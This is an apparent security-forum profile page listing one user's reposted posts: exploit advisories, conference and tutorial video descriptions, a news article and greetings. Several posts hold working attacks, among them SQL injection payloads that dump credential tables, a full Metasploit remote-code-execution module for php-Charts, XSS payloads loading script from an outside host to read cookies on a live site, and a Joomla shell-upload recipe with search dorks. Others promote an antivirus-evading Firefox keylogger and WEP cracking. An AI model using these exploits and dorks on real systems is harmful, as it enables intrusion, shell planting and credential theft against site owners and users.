Jump to content

Praetorian503

Active Members
  • Posts

    578
  • Joined

  • Last visited

  • Days Won

    5

Everything posted by Praetorian503

  1. Description: In this video I will show you how to exploit Kioptrix Level 3 Web-Application using SQL-Injection. Kioptrix is a vulnerable web Application for penetration testing. In this demo I will cover how to exploit a web using sql-injection and finding Web admin password. http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6 http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name="dev_accounts"),4,5,6 http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password, 0x0A) from dev_accounts),4,5,6 http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype, 0x3A, firstname, 0x3A, lastname, 0x3A, email, 0x3A, website, 0x3A, issuperuser, 0x3A, joincode) from gallarific_users),4,5,6 Source : - Kioptrix Level 3 Notes *Spoiler Alert* http://www.securitytube.net/video/6708
  2. Reclama la WC?! Super, maine imi iau unul identic!
  3. http://www.youtube.com/watch?v=oMa_OEdZEDY
  4. By John Leyden • Get more from this author Posted in Security, 18th January 2013 17:03 GMT Researchers have discovered security problems in management systems used to control X-ray machines and other medical devices. Terry McCorkle and Billy Rios of security start-up Cylance used fuzzing approaches previously applied to unearth security holes in industrial control systems to find a way into the Xper Information Management system from Philips. The tactic allowed the researchers to gain privileged user status onto the medical information management system. "Anything on it or what's connected to it was owned, too," Rios said during a presentation at Digital Bond’s annual SCADA Security Scientific Symposium (S4) conference, which took place in Miami this week. The attack was in part enabled by weak remote authentication supported by the system, as well weaknesses that left it open to fuzzing - a tactic that involves throwing variable inputs at a test device until a fault condition that might be exploited occurs. The researchers obtained the kit which had been in service at a Utah hospital from an unnamed reseller. "We noticed there was a port open, and we started basic fuzzing and found a heap overflow and wrote up a quick exploit for it," Rios told SC Magazine. "The exploit runs as a privileged service, so we owned the entire box - we owned everything that it could do." Authentication logins, one with a username Philips and password Service01, may be hardcoded but Philips denies this. Philips said that the flaw exists only in older version of Xper. It suggested that the vulnerability was in any case limited to data management features, rather than creating a mechanism for hackers to control connected medical kit. "Current Xper IM systems do not use this version of software," a Philips spokesman told Dark Reading. "If an Xper IM workstation is compromised by a potential vulnerability, that may affect the data management capability, but X-ray equipment continues to operate independently," he added. Both the US Department of Homeland Security (DHS) ICS-CERT, which normally deals with security issues involving industry control kit, and the US Food and Drug Administration (FDA) are reportedly taking an interest in the issue. Information security shortcomings in medical equipment and devices has hit the news before. For example during a presentation at Black Hat 2011, Jerome Radcliffe showed how it might be possible to either remotely turn off or alter the settings on Medtronic's insulin pumps. Radcliffe, himself a diabetic, was able to hack into the pumps without triggering alerts. Last year Barnaby Jack, the security researcher best known for "jackpotting" an ATM live on stage at BlackHat 2010, warned that pacemakers and implanted defibrillators are vulnerable to wireless attacks. Source: Paging Dr Evil: Philips medical device control kit 'easily hacked' • The Register
  5. Anti-Forensics And Anti-Anti-Forensics: Attacks And Mitigating Techniques For Digital-Forensic Investigations Description: Digital investigations may be conducted differently by various labs (law enforcement agencies, private firms, enterprise corporations) but each lab performs similar steps when acquiring, processing, analyzing, or reporting on data. This talk will discuss techniques that criminals can use to throw wrenches into each of these steps in order to disrupt an investigation, and how they can even force evidence to be excluded from litigation. Each of these techniques can be detected early by an investigator who is aware of them, and they can be avoided if you know what to look for. Come learn about Anti-Forensic techniques, and the Anti-Anti-Forensic techniques that mitigate them. Michael Perklin is a Senior Investigator and has performed digital-forensic examinations on over a thousand devices. Michael is a member of the High Technology Crime Investigations Association, a professor of digital forensics at Sheridan College, and is currently writing his thesis paper on anti-forensic techniques. Twitter: @mperklin PDF : - https://media.defcon.org/dc-20/presentations/Perklin/DEFCON-20-Perklin-AntiForensics.pdf Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Anti-Forensics And Anti-Anti-Forensics: Attacks And Mitigating Techniques For Digital-Forensic Investigations
  6. Description: The STMicroelectronics ST19WL18P TPM die-level analysis. Companies like Atmel, Infineon and ST are pushing motherboard manufacturers to use these devices. End-users trust these devices to hold passwords and other secrets. Once more, I will show you just how insecure these devices are. Christopher 'Biggun' Tarnovsky owns Flylogic, Inc. and specializes in analysis of semiconductors from a security "how strong is it really" standpoint. Flylogic offers detailed reports on substrate attacks which define if a problem exists. If a problem is identified, we explain in a detailed report all aspects of how the attack was done, level of complexity and so on. This is something we believe is unique and allows the customer to then go back to the chip vendor armed with the knowledge to make them make it better (or possibly use a different part). Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Attacking Tpm Part 2: A Look At The St19wp18 Tpm Device
  7. Description: Speaker: BOB PAN MOBILE SECURITY RESEARCH ENGINEER, TRENDMICRO INC. This concept of APK file infection on Android is similar to the concept of PE file infection on Windows systems. As the performance of Android device has increased, it's become possible to implement such a concept in Android systems. We will demonstrate how to implement this concept. In addition, we will also give a demo to show that a PoC virus can infect normal APK files in a real Android mobile phone. Bob Pan mainly focuses on mobile platform security domain(including Android/iOS platforms). He likes reverse-engineering and contributes to opensource. He is the owner of dex2jar (dex2jar - Tools to work with android .dex and java .class files - Google Project Hosting) which is one of most popular tools in the android security industry. Now he works as a Mobile Security Research Engineer at TrendMicro. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Apk File Infection On An Android System
  8. Description: PDF : - https://media.defcon.org/dc-20/presentations/Kirk/DEFCON-20-Kirk-An-Inside-Look-Into-Defense-Industrial-Base.pdf Extra : - https://media.defcon.org/dc-20/presentations/Kirk/Extras.zip With an ever changing threat of nation states targeting the United States and its infrastructure and insiders stealing information for public release, we must continuously evaluate the procedural and technical controls we place on our national assets. This presentation goes into brief detail on how security controls are developed, reviewed, and enforced at a national level for protection of data classified up to Top Secret and some of the major flaws in the security approach to data privacy. The purpose of this presentation is to raise awareness of substandard security practices within sensitive areas of the Federal Government and to influence change in how controls and practices are developed and maintained. James Kirk is a Senior Security Consultant for Rapid7, Inc. who has over 11 years of experience in various information security disciplines. James, in his previous role, has served as a Special Agent for the Department of Defense (Defense Security Service) where he conducted numerous security audits of defense contractor facilities across the United States. http://kirkjamesm.wordpress dot com Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:
  9. Description: Hacking Demonstration Screencast for my zero-day POC-Exploit for the Wordpress File Uploader Plugin. Exploit: http://goo.gl/8xb0l Google Dork: inurl:"wp-file-uploader" - Google Search More information: WordPress File Uploader Plugin PHP File Upload Vulnerability with Video Demonstration | L@usch.io Follow me on Twitter: https://twitter.com/La_usch Visit my Blog: L@usch.io | No Slogan! Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Hacking Demonstration For Wordpress File Uploader Plugin - Infect Targets With A Webshell
  10. This Metasploit module exploits a PHP code execution vulnerability in php-Charts version 1.0 which could be abused to allow users to execute arbitrary PHP code under the context of the webserver user. The 'url.php' script calls eval() with user controlled data from any HTTP GET parameter name. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "PHP-Charts v1.0 PHP Code Execution Vulnerability", 'Description' => %q{ This module exploits a PHP code execution vulnerability in php-Charts version 1.0 which could be abused to allow users to execute arbitrary PHP code under the context of the webserver user. The 'url.php' script calls eval() with user controlled data from any HTTP GET parameter name. }, 'License' => MSF_LICENSE, 'Author' => [ 'AkaStep', # Discovery and PoC 'Brendan Coles <bcoles[at]gmail.com>' # msf exploit ], 'References' => [ ['OSVDB', '89334'], ['BID', '57448'], ['EDB', '24201'] ], 'Payload' => { 'BadChars' => "\x00\x0a\x0d\x22", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet bash netcat-e perl ruby python', } }, 'DefaultOptions' => { 'ExitFunction' => "none" }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [ ['Automatic Targeting', { 'auto' => true }] ], 'Privileged' => false, 'DisclosureDate' => "Jan 16 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to the web application', '/php-charts_v1.0/']), ], self.class) end def check base = target_uri.path base << '/' if base[-1, 1] != '/' peer = "#{rhost}:#{rport}" fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4) code = Rex::Text.uri_encode(Rex::Text.encode_base64("echo #{fingerprint}")) rand_key_value = rand_text_alphanumeric(rand(10)+6) # send check print_status("#{peer} - Sending check") begin res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}" }) if res and res.body =~ /#{fingerprint}/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_error("#{peer} - Connection failed") end return Exploit::CheckCode::Unknown end def exploit base = target_uri.path base << '/' if base[-1, 1] != '/' @peer = "#{rhost}:#{rport}" code = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded+"&")) rand_key_value = rand_text_alphanumeric(rand(10)+6) # send payload print_status("#{@peer} - Sending payload (#{code.length} bytes)") begin res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{base}wizard/url.php?${system(base64_decode(\"#{code}\"))}=#{rand_key_value}" }) if res and res.code == 500 print_good("#{@peer} - Payload sent successfully") else fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end end end Source: PacketStorm
  11. The Aloaha Credential Provider Service is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (full) for the 'Everyone' group, for the 'AloahaCredentialProviderService.exe' binary file. The service was shipped with Aloaha PDF Saver and possibly every SmartCard Software package from Aloaha. The files are installed in the 'Wrocklage' directory which has the Everyone group assigned to it with full permissions making every single file inside vulnerable to change by any user on the affected machine. After you replace the binary with your rootkit, on reboot you get SYSTEM privileges. Version 5.0.226 is affected. Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation Vulnerability Vendor: Aloaha Software - Wrocklage Intermedia GmbH Product web page: http://www.aloaha.com Affected version: 5.0.226 Summary: Aloaha Credential Provider represents one of the most dramatic changes in the Windows Vista / 7 logon screen, making it much easier to implement new user authentication scenarios that are supported by the OS. To be able to logon via Smartcard to a windows machine requires usually the machine being a member of a domain. With the Aloaha Credential Provider that is not required, the logon screen is the first thing users see when they turn on the computer. Desc: The Aloaha Credential Provider Service is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (full) for the 'Everyone' group, for the 'AloahaCredentialProviderService.exe' binary file. The service was shipped with Aloaha PDF Saver and possibly every SmartCard Software package from Aloaha. The files are installed in the 'Wrocklage' directory which has the Everyone group assigned to it with full permissions making every single file inside vulnerable to change by any user on the affected machine. After you replace the binary with your rootkit, on reboot you get SYSTEM privileges. Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit/64bit Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5124 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5124.php 19.01.2013 --------------------------------------------------------------------------------- C:\Program Files\Wrocklage>sc qc AloahaCPM [SC] QueryServiceConfig SUCCESS SERVICE_NAME: AloahaCPM TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : "C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Aloaha Credential Provider Monitor DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Program Files\Wrocklage>cacls AloahaCredentialProviderService.exe C:\Program Files\Wrocklage\AloahaCredentialProviderService.exe NT AUTHORITY\SYSTEM:(ID)F Everyone:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R C:\Program Files\Wrocklage> --------------------------------------------------------------------------------- Source: PacketStorm
  12. Apache OFBiz versions 10.04.05 and below and 11.04.01 and below suffer from a reflected cross site scripting vulnerability. Full exploitation details provided. Title: Cross-Site Scripting (XSS) Vulnerability in Apache OFBiz Type: Remote Author: Juan Caillava (@jcaillava) / Marcos Garcia (@artsweb) CVE: CVE-2013-0177 Impact: Direct execution of arbitrary code in the context of Webserver user. Release Date: 18.01.2013 Summary ======= Apache Open For Business (Apache OFBiz) is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise. Description =========== Reflected Cross-Site Scripting Vulnerability affecting Screenlet.title and Image.alt Widget attributes because the content of these two elements is not properly escaped. Vendor ====== Apache ofbiz - http://ofbiz.apache.org/ PoC === It is worth mentioning that originally the resource was using the HTTP method POST, but it was changed to GET to exploit it more easily. Something important to remark is that for this attack to work, the victim should be authenticated. Below you can see how the URL is specially crafted to expose the issue: Affected URL: https://10.10.10.14:8443/exampleext/control/ManagePortalPages-> parameter: parentPortalPageId==[XSS] GET /exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script> HTTP/1.1 Host: 10.10.10.14:8443 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3 Connection: keep-alive Referer: https://10.10.10.14:8443/exampleext/control/main?externalLoginKey=EL367731470037 Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002 Solution ======== 10.04.* users should upgrade to 10.04.05 11.04.01 users should upgrade to 11.04.02 Vendor Status ============= [08.01.2013] Vulnerability discovered. [09.01.2013] Vendor informed. [09.01.2013] Vendor replied. [12.01.2013] Vendor reveals patch release date. [18.01.2013] Public advisory. Source: PacketStorm
  13. Adobe Experience suffers from a reflected cross site scripting vulnerability. The author contacted Adobe back in August but the issue is still not resolved so they are releasing details in hopes that Adobe will address the issue. Note that this finding houses site-specific data. ---------------------------------------------------------------------------------------------------- Title : Adobe Experience Delivers reflected Cross-site Scripting (XSS) vulnerability Vendor : Adobe Systems Incorporated (http://www.adobe.com) Description : experiencedelivers.adobe.com is vulnerable to reflected Cross-site Scripting attacks Advisory time-line: ---------------------------------------------------------------------------------------------------- - Vendor PSIRT notified : 05-Aug-2012 - Vendor response : 05-Aug-2012. Ticket created. "Looking into it now". - Status requests : 09-Sep-2012, 01-Nov-2012, 08-Nov-2012, 13-Nov-2012, 31-Dec-2012 Adobe PSIRT has not responded to any requests after 09-Nov-2012 - Packet Storm advisory : 19-Jan-2013 Test environment ---------------------------------------------------------------------------------------------------- - Latest Firefox browser Details ---------------------------------------------------------------------------------------------------- Affected functionality: search function Test #1: Remote Javascript execution: display browser cookie http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&blog=search&_charset_=UTF-8 Test #2, Remote Javascript execution: overwrite HTML content - PoC http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fae00.js%3E%3C%2Fscript%3E&blog=search&_charset_=UTF-8 Test #3, Alert test with image-tag http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&blog=search&_charset_=UTF-8 Note: the Javascript test cases are not malicious. Researcher ---------------------------------------------------------------------------------------------------- Janne Ahlberg Twitter: https://twitter.com/JanneFI Blog: http://janne.is Project site: http://idash.net ---------------------------------------------------------------------------------------------------- Source: PacketStorm
  14. The WordPress Ripe HD FLV player plugin suffers from path disclosure and remote SQL injection vulnerabilities. ------------------------------------------------------------------- Wordpress plugins - ripe-hd-player FD/SQL Injection Vulnerability ------------------------------------------------------------------- # Vendor: http://www.hitasoft.com/products.php ##### # Author => Zikou-16 # E-mail => zikou16x@gmail.com # Facebook => http://fb.me/Zikou.se # Google Dork => inurl:"/wp-content/plugins/ripe-hd-player/" # Tested on : Windows 7 , Backtrack 5r3 #### #=> Exploit Info : ------------------ # The attacker can access to the database & get username & password ....... & disclosure the Full Path ------------------ #=> Exploit : ------------------ 1#=> Full Path Disclosure : http://[target]/[path]/wp-content/plugins/ripe-hd-player/index.php http://[target]/[path]/wp-content/plugins/ripe-hd-player/installer.php ------- 2#=> SQL Injection http://[target]/[path]/wp-content/plugins/ripe-hd-player/config.php?id=2'[inj3ct h3re] ------------------------------ <= Th3 End ' Source: PacketStorm
  15. The Joomla Collector component suffers from a remote shell upload vulnerability. # Exploit Title:Joomla com_collecter shell upload # Author: Red Dragon_al (Alb0zZ Team) # Home :HackForums.AL,alb0zz.in # Date :19/01/2013 # Category:: web apps # Google dork: [inurl:index.php?option=com_collector] # Tested on: Windows XP # Download: http://www.steevo.fr/en/download # Home Page: http://www.steevo.fr/ --------------------------------------- # ~ Expl0itation ~ # --------------------------------------- 1- Google dork: [inurl:index.php?option=com_collector] 2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1 3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1 upload ur shell as : shell.php # Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends. #2013 Source: PacketStorm
  16. Classified Ultra ScriptsGenie suffers from cross site scripting and remote SQL injection vulnerabilities. Note that this finding houses site-specific data. # Exploit Title; Classified Ultra ScriptsGenie Multiple Vulnerabilities # Date; 20/1/13 # Author; 3spi0n # Script Vendor or Software Link; http://www.hotscripts.com/listing/classified-ultra-scriptsgenie/ # Category; Webapps # Type; SQL Injection [MySQLi] # Tested on; Ubuntu 12.10 / Win7 / Backtrack 5 [#] Demo Analyzing ; # http://resalemembership.com/demos/classifiedultra/nclass.php [Official Demo] [#] Vulnerable Analyzing ; [-] SQL Injection # http://resalemembership.com/demos/classifiedultra/subclass.php?c=16' [SQLi HERE] [...] Analyzing Selected Column Count is 4 Valid String Column is 3 Current DB: resalem1_ultra ... Tables found: Site_Admin,clientsignup,contact,o_ads,o_categories,o_catimages,o_subcategories [Using "Site_Admin"] ... Columns found: id,admin,passme ... Data Found: admin=admin Data Found: passme=pass [-] XSS # http://resalemembership.com/demos/classifiedultra/subclass.php?c=6&cname=Credit%20Cards[XSS HERE] [...] Analyzing # http://resalemembership.com/demos/classifiedultra/subclass.php?c=6&cname= <script>alert('3spi0n')</script> # http://resalemembership.com/demos/classifiedultra/subclass.php?c=6&cname=<IFRAME SRC="javascript:alert('3spi0n');"></IFRAME> [#] Greetz ; - Grayhatz Inc. & Janissaries Team - Twitter.Com/bariiiscan - Facebook.Com/3spi0ne Source: PacketStorm
  17. Description: SecurityTube Linux Assembly Expert (SLAE) Course Introduction - For full details on taking the course, please visit SecurityTube Linux Assembly Expert Source: http://www.securitytube.net/video/6707
  18. Bine ai venit. In sfarsit o prezentare care mi-a facut placere sa o citesc.
  19. OFF: Fa'ti si tu o prezentare normala, in care sa specifici cateva lucruri. Ex: Cunostiinte, pile, relatii, etc. ON: Bun venit!
  20. Description: This short tutorial shows you how to create a simple cookie catcher when cross-site scripting(XSS) and unsecure cookies exists on a web application. Penetration testers can use this to show clients how easy it is to grab cookies from a web application if it is vulnerable to cross-site scripting. Cookie Catcher Script: Cookie Catcher PHP Script - Pastebin.com Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Xss Cookie Catcher Tutorial
  21. Description: Xenotix KeylogX is a Keylogger add-on for Mozilla Firefox. www.kerlacyberforce.in Features Bypass Key Scrambler Bypass Virtual Keyboard Undetectable by Anti-Virus USAGE Install,set a password. To view the logs: ALT+SHIFT+\ Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Xenotix Local Keylogger For Firefox V3
  22. Description: In this video I will show you how crcak WEP key using Wifite. This tool is very easy to use and very powerful if one attack method won’t work so the will start working on the next attack and the best thing is this tool is fully automatic and powerful. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Automated Way To Crack Wep Using Wifite
  23. Description: In this video I will show you how to use Volatility Framework for some basic information gathering for the memory. I will show you how to identify the Image and how to dump suspect file Commands : - ./vol.py –f stuxnet.vmem –profile=WinXPSP3x86 imageinfo Image Identification ./vol.py –f stuxnet.vmem –profile=WinXPSP3x86 kpcrscan Image Identification ./vol.py –f stuxnet.vmem –profile=WinXPSP3x86 kdbgscan Image Identification ./vol.py –f stuxnet.vmem –profile=WinXPSP3x86 pslist To list the processes of a system ./vol.py –f stuxnet.vmem –profile=WinXPSP3x86 pstree To view the process listing in tree form, use the pstree command ./vol.py –f stuxnet.vmem –profile=WinXPSP3x86 psscan To enumerate processes using pool tag scanning ./vol.py –f stuxnet.vmem –profile=WinXPSP3x86 dlllist To display a process's loaded DLLs ./vol.py –f stuxnet.vmem –profile=WinXPSP3x86 dlllist --pid=492 To extract a DLL from a process's memory space and dump it to disk for analysis ./vol.py –f stuxnet.vmem –profile=WinXPSP3x86 dlldump -r kernel32 -D out To extract a DLL from a process's memory space and dump it to disk for analysis ./vol.py –f stuxnet.vmem –profile=WinXPSP3x86 handles To display the open handles in a process, use the handles command. ./vol.py –f stuxnet.vmem –profile=WinXPSP3x86 handles -p 4 -t Key To display the open handles in a process, use the handles command. ./vol.py –f stuxnet.vmem –profile=WinXPSP3x86 getsids To view the SIDs (Security Identifiers) associated with a process CommandReference - volatility - Example usage cases and output for Volatility 2.0 commands - An advanced memory forensics framework - Google Project Hosting Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Volatility Image Identification And Processes And Dlls Usage
  24. Bun venit! Da' de ce ai scris asa mare?
×
×
  • Create New...